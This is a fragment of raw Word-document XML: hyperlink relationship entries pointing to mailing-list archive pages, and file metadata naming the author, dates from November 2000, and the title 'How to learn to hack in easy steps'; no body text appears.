          <w:color w:val="0000FF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rt.at/modem" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.host.com/luser/index.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../in/msg02305.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../in/msg02242.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../in/msg02225.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../in/msg02186.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../in/msg01990.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../in/msg01449.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../in/msg01451.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../in/msg01457.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../in/msg01990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8T02:05:00Z</dcterms:created>
  <dc:creator>Lynn Burford</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Lynn Burford</cp:lastModifiedBy>
  <cp:lastPrinted>2000-11-17T21:06:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-11-18T02:06:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title>How to learn to hack in easy steps</dc:title>
</cp:coreProperties>
</file>